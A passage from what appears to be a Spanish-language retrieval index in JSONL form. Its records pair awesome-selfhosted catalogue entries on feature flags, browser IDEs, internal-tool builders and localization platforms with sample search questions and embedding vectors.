self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "con que herramienta puedo implementar flags feature en mis aplicaciones", "v": [-0.00599, 0.20677, -0.12619, -0.27713, 0.04994, -0.08998, -0.12314, 0.04079, -0.11815, 0.00847, 0.00478, -0.05541, -0.02238, -0.04086, 0.07444, 0.10286, 0.01797, -0.18368, -0.04212, 0.0099, -0.07636, 0.04888, -0.18895, -0.09422, -0.11556, 0.04119, -0.00986, 0.02475, -0.1386, -0.07129, 0.00864, 0.00781, 0.08592, -0.08582, -0.15464, -0.13981, -0.08892, 0.01777, -0.00918, -0.0098, -0.01081, 0.05288, -0.07976, 0.0209, 0.00694, -0.04384, 0.01172, 0.00635, 0.02126, 0.02825, -0.01165, -0.17651, -0.0926, 0.0447, 0.01242, -0.08996, 0.14101, -0.13504, 0.03273, -0.04698, -0.13056, 0.09413, -0.06591, -0.02278, 0.04866, -0.027, -0.00085, -0.00883, -0.02771, 0.08765, 0.04004, 0.05985, -0.00304, -0.01737, -0.01258, 0.09952, -0.03424, -0.03343, 0.03238, 0.005, -0.01541, -0.0392, -0.10291, 0.05709, -0.05086, -0.12936, 0.02027, 0.02059, 0.07972, -0.11396, -0.01087, 0.12865, -0.022, -0.00894, 0.0212, 0.0003, 0.08802, -0.02582, 0.09128, 0.05753, 0.09399, -0.08046, -0.04391, 0.03056, -0.05636, -0.0267, -0.03344, -0.01848, 0.01244, -0.01847, 0.03068, -0.08081, 0.00268, 0.07259, -0.00527, 0.05273, 0.00777, -0.09517, 0.0092, -0.05171, -0.0369, -0.02156, 0.00674, -0.01982, 0.11783, 0.0202, -0.07159, 0.09345, -0.02628, 0.02188, 0.02965, -0.01195, -0.04874, 0.00386, -0.08214, 0.02802, 0.00558, -0.15428, 0.01234, -0.04859, 0.03371, 0.01131, 0.00892, -0.04485, 0.06867, 0.06557, -0.03668, -0.01902, -0.00143, 0.01014, 0.07629, -0.08876, -0.04782, -0.01117, -0.07074, -0.01811, 0.03097, 0.0349, -0.05604, 0.02088, -0.05047, -0.05643, -0.05921, 0.00817, 0.0175, -0.05688, 0.07454, 0.00066, 0.08414, 0.09481, -0.00155, 0.08103, 0.09274, -0.05147, -0.00689, -0.03376, -0.01679, 0.011, 0.00899, -0.0816, -0.07536, 0.00585, 0.01785, -0.02597, 0.0622, -0.08974, -0.05039, 0.01885, 0.04325, 0.02036, -0.01105, 0.02909, 0.04609, -0.03875, 0.0118, 0.0199, -0.00175, -0.04056, -0.025, -0.02011, -0.03864, -0.0186, -0.04984, -0.04448, 0.02391, 0.05897, -0.01197, 0.05557, 0.01256, 0.03425, -0.00639, 0.00893, 0.02408, 0.07344, 0.00391, -0.07528, 0.02439, 0.0775, 0.01233, -0.03195, 0.01759, -0.0033, 0.00524, -0.02173, -0.02685, 0.0417, -0.03664, -0.00705, -0.01556, -0.03837, 0.04339, -0.01252, -0.04642, -0.01163, 0.01283, -0.04445, 5e-05, -0.0436, -0.07916, -0.06533, -0.03511, 0.05866, 0.07814, -0.00046, -0.04742, -0.03772, 0.01943, -0.03152, -0.02083, -0.05672, -0.03353, 0.04227, 0.10177, -0.02965, 0.00349, 0.0004]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "con que puedo montar un entorno de programaciΓ³n en el navegador sin instalar nada?", "v": [0.03718, 0.11015, -0.27038, -0.18826, -0.12876, -0.02183, 0.01344, 0.02634, -0.15205, -0.12228, -0.02134, 0.0073, 0.02041, -0.08157, -0.01034, 0.12278, 0.0472, -0.11601, 0.07882, 0.06537, -0.08573, -0.05245, 0.03164, -0.00329, 0.02523, 0.05288, -0.05029, -0.02942, -0.11121, -0.11468, 0.00222, 0.09605, 0.10239, 0.00163, -0.03872, -0.05909, 0.07264, -0.04751, 0.02498, -0.07723, -0.00906, -0.00198, 0.01402, 0.13432, -0.02154, -0.00209, 0.04222, -0.10899, 0.04634, -0.1238, 0.04207, 0.04011, -0.03421, -0.05112, 0.02528, -0.07829, 0.14889, -0.11189, 0.12819, -0.09664, -0.01146, 0.17327, -0.04042, 0.10135, 0.07688, 0.01945, 0.02188, 0.06418, -0.06801, -0.01901, 0.00197, -0.06665, -0.08294, -0.0109, 0.02208, 0.1044, -0.03466, -0.00051, 0.10338, 0.06571, 0.02994, -0.00422, 0.00027, 0.02691, -0.08628, -0.07562, 0.01334, -0.04705, 0.02113, -0.05729, 0.06225, 0.07352, -0.0292, 0.00878, 0.04636, -0.15419, 0.1586, 0.06585, 0.05394, 0.0312, -0.07565, -0.03258, -0.02293, 0.14791, 0.06576, 0.02412, 0.11826, -0.14598, 0.05454, -0.03588, 0.02066, 0.01495, -0.07636, -0.06288, -0.02165, -0.04191, 0.00138, 0.00314, -0.08024, -0.0504, -0.09744, 0.02574, -0.06223, 0.02662, 0.02192, 0.05051, 0.04636, 0.10847, -0.00763, 0.06601, 0.0173, -0.08898, 0.00649, 0.00574, -0.08466, 0.01219, -0.05243, -0.04767, 0.00116, -0.02422, 0.07909, 0.014, -0.00814, 0.00965, 0.0623, 0.03686, -0.05365, -0.05676, -0.03374, -0.03484, 0.05389, 0.08081, 0.03064, 0.06639, -0.10169, 0.00541, 0.05607, -0.00097, 0.0494, 0.04484, -0.02637, 0.04614, 0.00485, -0.00317, -0.01759, -0.01472, -0.08121, -0.03765, 0.11508, 0.0646, -0.05671, 0.08511, 0.01776, -0.08238, 0.03143, -0.00927, -0.01192, -0.03835, 0.01741, -0.0062, -0.03785, 0.02854, -0.0183, 0.0081, -0.07974, -0.05081, 0.00095, -0.01, -0.06502, -0.00835, 0.01416, 0.04164, -0.06109, 0.01912, 0.07638, -0.03244, -0.07865, 0.0094, -0.03023, -0.02531, -0.02459, 0.02275, -0.0024, -0.03033, 0.0563, 0.04563, -0.04163, 0.05562, 0.00186, 0.09062, 0.0532, -0.05165, 0.02039, -0.01795, -0.02084, -0.01198, 0.06266, 0.00243, 0.00912, 0.04177, -0.0206, -0.00667, 0.05892, -0.02245, 0.00895, -0.0629, 0.02879, 0.02438, 0.02553, 0.04147, -0.05379, -0.00153, -0.05076, -0.03511, 0.01842, 0.01946, 0.01972, -0.01815, -0.04825, -0.01847, 0.00077, 0.06578, 0.01395, -0.08314, -0.05548, -0.03724, -0.04872, 0.01376, 0.01628, -0.06078, -0.04161, 0.04139, 0.02416, -0.06057, -0.02032, 0.02573]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "cual es una alternativa libre a VS Code para alojarlo remotamente?", "v": [-0.09123, -0.10716, -0.13315, 0.0717, -0.08625, -0.02597, 0.06901, -0.04643, -0.09858, -0.12845, -0.05393, -0.39341, 0.12861, 0.05363, 0.22702, -0.03108, 0.08179, -0.02671, 0.08537, -0.05676, -0.01981, -0.11514, 0.0024, -0.02407, -0.01295, -0.00249, 0.01922, 0.03485, -0.03351, -0.1173, 0.08531, -0.07594, 0.04259, -0.02028, -0.05598, 0.09807, 0.17938, 0.12341, 0.05258, 0.01623, 0.07028, 0.00578, -0.01087, 0.02788, 0.00041, -0.05933, -0.01826, 0.08858, 0.04024, 0.07796, -0.15921, -0.02271, -0.03834, -0.017, 0.09102, -0.01804, 0.18378, -0.1165, -0.12045, -0.01119, -0.02254, -0.06787, -0.00592, -0.11654, -0.01888, -0.03415, -0.03827, 0.02339, -0.09036, 0.01958, -0.03458, 0.07132, -0.00896, -0.05491, -0.10413, 0.064, -0.13464, -0.0281, 0.00964, 0.03007, -0.01709, -0.07058, -0.01551, -0.01268, -0.07702, -0.09767, 0.04733, -0.04221, -0.04162, -0.04241, 0.05782, 0.01263, 0.00816, 0.06239, 0.00748, -0.06107, 0.00244, 0.08022, 0.02216, 0.03731, 0.02004, 0.02576, -0.03508, -0.00389, 0.01892, 0.01788, 0.0513, 0.03421, -0.03629, 0.01083, 0.00243, 0.04229, -0.02969, 0.03598, -0.06579, -0.06807, -0.07229, 0.02888, 0.04601, -0.00263, -0.07098, 0.03005, -0.09719, -0.04181, 0.0693, 0.03025, 0.04211, 0.07774, -0.02133, 0.00026, 0.00489, -0.03477, -0.05184, -0.07237, -0.00844, -0.00176, 0.03783, -0.07376, -0.01258, -0.00187, 0.01276, 0.0145, 0.00052, 0.03322, 0.07497, -0.01689, -0.02731, -0.04425, -0.00131, -0.03883, -0.05437, 0.00799, -0.00802, 0.07098, -0.08627, 0.02502, -0.09292, -0.03451, -0.10652, 0.05022, -0.03836, -0.05379, 0.03016, -0.07827, -0.01727, -0.04535, -0.00784, -0.08783, -0.05503, 0.02228, -0.04529, 0.07895, 0.08039, -0.04715, 0.01373, -0.04909, 0.04686, -0.1009, -0.02004, -0.04535, 0.00395, 0.06138, -0.05598, -0.04726, 0.03271, -0.00044, 0.0446, 0.00359, 0.02317, -0.02169, -0.03514, 0.00386, -0.07682, -0.02389, -0.01849, -0.00902, 0.03131, -0.07588, 0.00511, 0.0021, -0.08917, -0.03352, 0.01325, -0.03747, 0.02885, 0.00163, -0.0218, 0.04615, 0.00873, 0.05006, 0.03619, -0.05873, 0.07552, 0.02562, -0.05741, -0.00542, -0.00075, -0.05305, 0.03238, 0.00598, 0.02268, 0.03196, 0.03028, 0.01145, -0.00081, 0.04928, 0.04181, 0.06616, -0.03254, -0.01974, 0.03579, -0.01773, 0.02171, 0.03295, 0.02607, 0.02812, -0.01649, 0.01426, 0.02554, -0.02149, 0.03088, 0.0947, -0.04005, -0.03755, -0.01955, 0.01566, -0.1222, -0.02158, -0.07763, -0.06034, -0.04556, 0.01142, 0.02313, 0.03621, 0.0055, 0.01025]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: Atheos β€” Web-based IDE framework with a small footprint and minimal requirements, continued from Codiad [MIT, PHP/Docker]. code-server β€” VS Code in the browser, hosted on a remote server [MIT, Nodejs/Docker]. Coder β€” Remote development machines on your own infrastructure [AGPL-3.0, Go/Docker/K8S/deb]. Eclipse Che β€” Open source workspace server and cloud IDE [EPL-1.0, Docker/Java]. Hopp β€” Remote pair programming app with low-latency 4K screen sharing, drawing, and remote control, with clients for macOS and Windows (alternative to Tuple, Pop, Drovio, Coscreen) [AGPL-3.0, Docker]. Judge0 CE β€” API to compile and run source code [GPL-3.0, Docker]. JupyterLab β€” Web-based environment for interactive and reproducible computing [BSD-3-Clause, Python/Docker]. Langfuse β€” LLM engineering platform for model tracing, prompt management, and application evaluation. Langfuse helps teams collaboratively debug, analyze, and iterate on their LLM applications such as chatbots or AI agents [MIT, Docker].", "indexar": "que herramienta sirve para ejecutar cΓ³digo y compilarlo desde la nube?", "v": [-0.0132, -0.06416, -0.20518, -0.11179, 0.07508, -0.25203, -0.0829, 0.04621, -0.1278, -0.17076, -0.13195, -0.14052, 0.05456, -0.09374, -0.03025, -0.04442, 0.03266, -0.12094, -0.00545, 0.02756, 0.00699, -0.01231, -0.08001, -0.02348, -0.11156, 0.03174, 0.07466, 0.05906, -0.15919, -0.03003, -0.00103, -0.0347, 0.0889, -0.1004, -0.03953, 0.04633, 0.02077, 0.0689, -0.22271, 0.07751, -0.08997, 0.0906, -0.14171, 0.09935, -0.02654, -0.01185, 0.04114, 0.01502, 0.04169, 0.09879, -0.07564, -0.0328, -0.10881, 0.01389, -0.01756, -0.1066, 0.12611, -0.13126, -0.02996, -0.07505, -0.04096, -0.05967, 0.00612, -0.15467, 0.04039, -0.02335, -0.01029, -0.02197, -0.11009, 0.09309, -0.03544, 0.1276, -0.04911, -0.00787, 0.02441, -0.02046, -0.00462, -0.05797, 0.01227, 0.08917, -0.00707, 0.01484, -0.09381, -0.06589, -0.04794, -0.03834, 0.05762, -0.07741, 0.05557, -0.05927, 0.03466, 0.03034, 0.02839, 0.06308, 0.07299, 0.05798, 0.08808, 0.04892, 0.02451, 0.02617, 0.14262, -0.07695, -0.03641, 0.03599, 0.04964, 0.11097, 0.05592, 0.00396, -0.01292, 0.01745, 0.0338, -0.04183, -0.03126, 0.02189, -0.03527, -0.04285, 0.04584, -0.06823, -0.03163, -0.02278, -0.04677, 0.06478, -0.1283, -0.02034, 0.00479, 0.01506, -0.04918, 0.06894, -0.05453, -0.09148, -0.13084, -0.03748, -0.02048, 0.05846, 0.01349, 0.01597, 0.00138, -0.13311, 0.0333, -0.04405, 0.05293, 0.02651, -0.01287, 0.08368, 0.03942, 0.01807, 0.03696, -0.00775, 0.00628, -0.04925, 0.06743, 0.02776, -0.12447, 0.03316, -0.12147, 0.01774, -0.02227, 0.06462, -0.08188, -0.00716, 0.0316, -0.03488, -0.01691, -0.03633, 0.0414, -0.03224, 0.00822, -0.01293, 0.04503, 0.0869, 0.03295, 0.01305, 0.05974, -0.06996, 0.03127, -0.05021, -0.00156, -0.01927, -0.02535, -0.03424, -0.01839, -0.00483, 0.05171, 0.00987, 0.00687, -0.01884, 0.03174, -0.02381, -0.03324, 0.03604, -0.01463, 0.02891, -0.00213, -0.05344, 0.042, -0.00545, -0.04109, -0.0432, 0.00627, -0.03997, -0.07086, 0.03525, -0.03008, -0.08166, 0.02949, 0.08075, -0.03351, 0.01439, -0.01444, 0.03713, 0.02741, -0.00469, -0.01004, -0.00605, 0.00496, -0.03425, 0.02273, 0.03756, 0.01931, -0.01714, -0.02235, -0.0326, 0.0355, -0.03879, -0.00449, 0.01279, -0.01096, 0.05664, 0.00878, -0.00977, 0.00593, -0.02399, 0.01527, -0.01888, 0.01724, -0.00091, 0.01991, 0.00198, -0.05467, -0.06435, -0.04039, 0.04244, -0.01407, -0.0327, -0.06303, -0.02409, -0.01835, -0.05665, -0.00915, -0.05258, -0.0441, 0.00481, 0.06623, -0.04187, -0.01321, -0.00835]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "que herramienta sirve para crear herramientas internas y paneles de administraciΓ³n con YAML?", "v": [0.05546, 0.05628, -0.13036, -0.27124, -0.00275, -0.14366, -0.05875, -0.00085, -0.08713, -0.06439, -0.14466, 0.03032, 0.06817, -0.14023, 0.03617, 0.15101, 0.04386, -0.1513, 0.01131, 0.0228, -0.05794, 0.07681, -0.12705, -0.03552, -0.14608, 0.01406, 0.03525, -0.11569, -0.17414, 0.10527, -0.00437, 0.0484, 0.00778, -0.09729, -0.03155, -0.11229, -0.04733, 0.08202, -0.08356, 0.13843, -0.05398, 0.04445, -0.04182, 0.09297, 0.03117, 0.00969, 0.02049, 0.00667, 0.00074, 0.09818, -0.11848, -0.14167, -0.119, 0.0429, 0.07099, -0.13574, 0.10646, -0.13744, 0.02694, -0.12342, -0.20673, 0.02957, -0.07541, -0.00408, -0.02169, 0.02271, -0.00753, -0.07531, -0.05241, 0.11317, -0.02858, -0.01227, 0.05102, -0.05423, -0.00346, -0.02276, -0.03831, 0.06334, -0.00422, -0.03476, 0.01159, -0.00699, -0.13178, 0.04675, -0.06695, -0.11347, 0.03548, -0.08365, -0.00285, -0.07771, -0.03577, 0.03876, -0.04681, -0.0096, 0.01976, 0.03173, 0.05595, -0.07217, 0.01502, 0.03192, 0.12724, -0.08126, -0.02121, 0.07889, -0.03044, 0.05932, -0.00418, -0.02733, 0.00787, 0.01783, 0.06375, 0.09325, 0.05613, 0.05153, 0.02954, 0.02654, -0.03541, 0.00966, -0.05177, -0.06207, 0.0867, -0.02354, -0.0962, -0.03786, -0.01762, -0.03867, 0.0253, 0.03956, -0.03884, -0.01187, 0.03173, -0.07869, -0.07967, 0.08033, -0.04351, -0.02357, -0.02293, -0.09563, -0.06688, -0.07578, 0.0195, 0.04831, -0.02643, -0.12801, 0.03897, -0.00925, 0.00889, -0.02678, 0.05179, 0.06098, 0.06226, -0.05678, 0.04364, 0.04722, -0.08178, -0.01799, -0.05256, 0.02621, -0.09178, 0.02392, -0.07578, -0.03257, 0.06629, 0.04561, 0.01048, -0.06069, -0.01741, 0.0492, 0.07015, 0.05065, 0.022, 0.01617, 0.08565, 0.00234, -0.00846, -0.04401, -0.02588, -0.03668, 0.01556, -0.0562, -0.0152, -0.02836, -0.0382, 0.00316, 0.03296, -0.0188, -0.00186, -0.014, 0.00643, 0.07319, -0.0438, 0.0359, 0.02129, -0.07715, 0.05065, 0.04695, 0.02522, -0.03557, 0.03295, -0.01685, -0.00014, 0.02551, 0.00138, -0.06375, -0.0115, 0.05182, -0.03459, 0.02072, 0.01121, 0.03882, 0.03955, 0.03973, 0.0168, 0.00312, -0.00659, -0.03068, 0.00903, 0.00779, 0.01525, -0.03129, 0.04659, -0.00813, 0.00917, -0.00556, 0.04139, 0.03244, -0.03252, 0.03756, -0.01774, -0.03586, 0.01649, -0.01041, 0.02628, 0.01759, -0.00959, -0.05817, 0.04742, -0.0177, -0.01575, 0.01532, -0.02283, 0.02778, 0.0081, -0.01533, -0.02667, -0.02018, 0.04029, -0.04318, -0.06139, -0.04573, -0.03275, -0.01548, 0.03294, 0.01444, -0.00226, -0.01936]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "cual es una alternativa libre a RStudio Server para usar en el navegador?", "v": [-0.12305, -0.0152, -0.15823, -0.19155, -0.10246, -0.08737, -0.0137, -0.1861, 0.02418, -0.06129, -0.1036, -0.26421, -0.03643, -0.0691, 0.05268, -0.03587, 0.07058, -0.05534, 0.09234, 0.0246, -0.04713, -0.02937, -0.05436, 0.05573, -0.04505, -0.04393, 0.02121, -0.06119, -0.00399, -0.01371, -0.03902, -0.03853, 0.11241, -0.06592, -0.08505, -0.04957, 0.19079, 0.06507, 0.02821, -0.01732, 0.13151, -0.06901, -0.07128, 0.05384, 0.01511, 0.04143, 0.00678, -0.05189, -0.05357, 0.09384, 0.00784, 0.02907, -0.11595, 0.10054, 0.04479, -0.05459, 0.11291, -0.17262, 0.00646, -0.08735, 0.02307, -0.02491, 0.00512, -0.00858, 0.01214, -0.07234, -0.07437, 0.02423, -0.09403, 0.05324, 0.01014, -0.00448, 0.06683, 0.04093, -0.0292, 0.12226, -0.04502, -0.02857, 0.11704, 0.01894, 0.00674, -0.02811, -0.08748, -0.02682, -0.08706, -0.14187, 0.09322, -0.09585, 0.00446, 0.01745, 0.03325, 0.11005, -0.03589, 0.05161, 0.02148, -0.16935, 0.05581, 0.00214, 0.10895, -0.03087, 0.11048, 0.04601, -0.05096, 0.05735, 0.0348, -0.02703, -0.00048, -0.032, -0.13518, 0.03223, 0.00941, 0.01674, -0.07998, -0.01039, -0.0182, 0.0215, 0.03534, 0.00528, -0.01349, -0.08076, -0.03879, 0.0283, -0.09309, -0.04574, -0.01251, 0.04815, 0.03872, 0.01363, -0.08428, 0.01387, -0.0003, -0.08937, -0.11675, -0.04304, -0.12114, 0.01818, 0.05643, -0.09501, 0.01879, -0.01807, 0.03955, 0.02071, -0.03851, 0.03039, 0.1176, -0.00647, 0.00704, 0.00742, -0.07072, -0.08172, 0.0096, -0.05657, 0.00045, 0.02295, -0.0831, -0.01145, -0.0086, -0.05174, -0.03307, 0.11415, 0.00582, -0.00439, 0.04178, 0.07394, 0.02465, -0.03901, -0.04472, -0.03014, -0.01568, 0.03422, 0.04543, 0.03808, 0.06091, -0.08679, 0.0548, -0.03378, -0.06747, -0.10597, -0.01641, -0.0256, 0.05524, -0.02839, -0.0823, 0.02298, -0.02411, -0.03721, -0.00489, 0.00272, 0.00498, 0.06173, -0.05077, 0.0655, -0.06217, -0.05816, 0.04484, -0.02498, -0.011, -0.11121, 0.00271, 0.03592, -0.04915, 0.0095, -0.03711, -0.04669, -0.00421, -0.03702, -0.02107, -0.01123, -0.00138, 0.0162, 0.01951, -0.02058, 0.12206, 0.02178, -0.00447, 0.02343, 0.0638, 0.0201, -0.00706, -0.04231, -0.03206, 0.00678, -0.02249, 0.02458, 0.04314, 0.06573, 0.06568, 0.02413, -0.06572, -0.01599, 0.02156, -0.00399, -0.03944, -0.00345, 0.02479, -0.02009, 0.02721, 0.02625, 0.00103, -0.03344, 0.04086, 0.04724, 0.00229, -0.00999, -0.01167, -0.01545, -0.08745, -0.01403, -0.04025, -0.01345, -0.02759, 0.03458, 0.00528, -0.03408, 0.01169, 0.03513]} -{"tipo": "pregunta", "herramienta": "Software Development - IDE & Tools", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - IDE & Tools", "tema": "software development - ide & tools", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - IDE & Tools: LiveCodes β€” Feature-rich client-side code playground for React, Vue, Svelte, Solid, Typescript, Python, Go, Ruby, PHP and 90+ other languages [⚠, MIT, Nodejs]. Lowdefy β€” Build internal tools, BI dashboards, admin panels, CRUD apps and workflows in minutes using YAML / JSON on an self-hosted, open-source platform. Connect to your data sources, host via Serverless, Netlify or Docker [Apache-2.0, Nodejs/Docker]. RapidForge β€” Lightweight platform for building webhooks, scheduled tasks and pages. Implement your logic with Bash or Lua [Apache-2.0, Go/Nodejs]. RStudio Server β€” Web browser based IDE for R [AGPL-3.0, Java/C++].", "indexar": "con que puedo montar un cΓ³digo playground funcional para React o Python sin instalar nada localmente?", "v": [0.02733, 0.09883, -0.19901, -0.18799, -0.07727, -0.18341, -0.05249, 0.05146, -0.18001, -0.01539, 0.00382, -0.04506, 0.00333, -0.00937, 0.02472, -0.00357, -0.06704, -0.17444, 0.03441, -0.04469, -0.16499, -0.08477, -0.08767, -0.08863, 0.18823, 0.18357, 0.06942, 0.02232, -0.06454, -0.06208, 0.14094, 0.09836, 0.11861, 0.03952, -0.15533, -0.05207, 0.1312, 0.06314, 0.0167, -0.00961, -0.10061, 0.02606, -0.06983, 0.16752, -0.10982, 0.05554, 0.06981, -0.06413, -0.0143, -0.00792, -0.03278, -0.03509, -0.06051, -0.04942, 0.035, -0.08378, 0.06202, -0.0584, 0.0431, 0.00268, -0.10053, 0.05286, -0.04656, 0.04137, 0.03332, 0.02449, 0.08271, 0.03568, -0.07956, 0.03515, -0.0601, -0.00087, -0.06071, 0.03032, 0.01405, 0.11013, -0.1108, -0.11937, 0.03281, 0.09742, -0.05006, -0.08073, -0.04049, 0.04161, 0.02086, -0.07419, 0.01233, -0.11648, 0.0675, -0.03999, 0.05824, 0.07029, 0.01276, -0.02891, -0.03358, -0.03865, 0.14347, 0.0988, 0.01518, 0.05436, -0.00749, -0.04426, 0.06233, 0.11737, 0.06311, -0.02308, 0.08822, 0.0096, 0.06772, -0.03063, 0.04789, -0.05448, -0.10669, 0.01207, -0.10966, -0.06438, -0.09602, 0.04665, -0.02275, 0.05775, -0.05211, 0.06776, -0.02919, 0.05082, -0.03824, 0.02809, 0.08024, 0.09852, -0.02701, 0.02605, -0.04828, -0.03689, 0.03111, -0.00312, -0.08791, 0.10535, 0.08525, 0.00564, -0.00404, 0.06472, 0.00284, 0.01396, 0.01786, 0.06253, -0.02857, 0.0585, 0.03139, -0.0419, -0.01811, 0.00242, 0.09266, 0.08746, 0.01706, 0.03114, -0.09649, -0.00074, 0.03502, 0.00663, -0.02546, -0.02373, -0.00544, -0.00113, -0.01593, -0.04598, 0.03006, -0.02827, -0.05103, -0.01008, 0.06009, 0.06654, -0.00028, 0.05049, 0.06339, -0.03145, 0.04073, -0.03194, 0.01387, -0.01032, 0.02946, -0.03638, 0.00118, 0.04804, 0.00974, 0.02162, -0.01437, -0.02998, -0.01685, 0.01893, -0.00841, 0.01016, 0.01165, 0.03851, -0.0181, 0.01031, -0.01124, -0.00346, 0.01553, -0.00759, -0.03763, -0.04543, 0.00907, 0.04603, -0.04629, -0.05697, 0.05396, 0.03379, -0.06118, 0.02537, -0.01915, -0.01047, 0.0271, -0.02017, 0.04491, 0.00101, 0.03329, -0.03917, 0.01915, 0.04589, -0.01216, 0.01082, -0.02575, -0.00158, 0.06451, -0.00161, -0.00791, -0.02598, 0.01418, 0.0414, 0.03235, 0.0301, -0.04335, 8e-05, 0.00985, -0.0364, 0.0187, 0.00855, 0.02101, 0.02664, -0.04095, -0.05036, 0.00374, 0.04882, 0.00736, -0.05615, -0.05284, -0.04089, -0.05467, -0.00751, -0.01854, -0.03817, -0.0521, -0.00973, 0.01125, -0.09079, -0.01401, 0.00513]} -{"tipo": "pregunta", "herramienta": "Software Development - Localization", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Localization", "tema": "software development - localization", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Localization: Accent β€” Developer-oriented translation tool [BSD-3-Clause, Elixir/Docker]. Tolgee β€” Developer & translator friendly web-based localization platform enabling users to translate directly in the app they develop [Apache-2.0, Docker/Java]. Traduora β€” Translation management platform for teams [AGPL-3.0, Docker/K8S/Nodejs]. Weblate β€” Web-based translation tool with tight version control integration [GPL-3.0, Python/Docker/K8S].", "indexar": "con quΓ© programa puedo gestionar la traducciΓ³n de mis aplicaciones web", "v": [-0.03366, 0.13902, 0.04067, -0.30746, 0.06699, 0.00072, 0.00348, 0.02103, -0.13697, 0.02346, -0.05275, -0.07013, 0.00097, -0.00723, -0.00022, 0.04581, 0.1236, -0.10785, 0.05477, 0.01877, -0.0044, 0.00909, -0.04486, -0.13169, -0.0809, 0.02098, 0.04651, -0.05304, 0.02212, -0.02132, -0.09736, -0.02511, 0.08362, -0.07658, -0.04759, 0.05901, -0.01767, 0.02006, 0.03591, 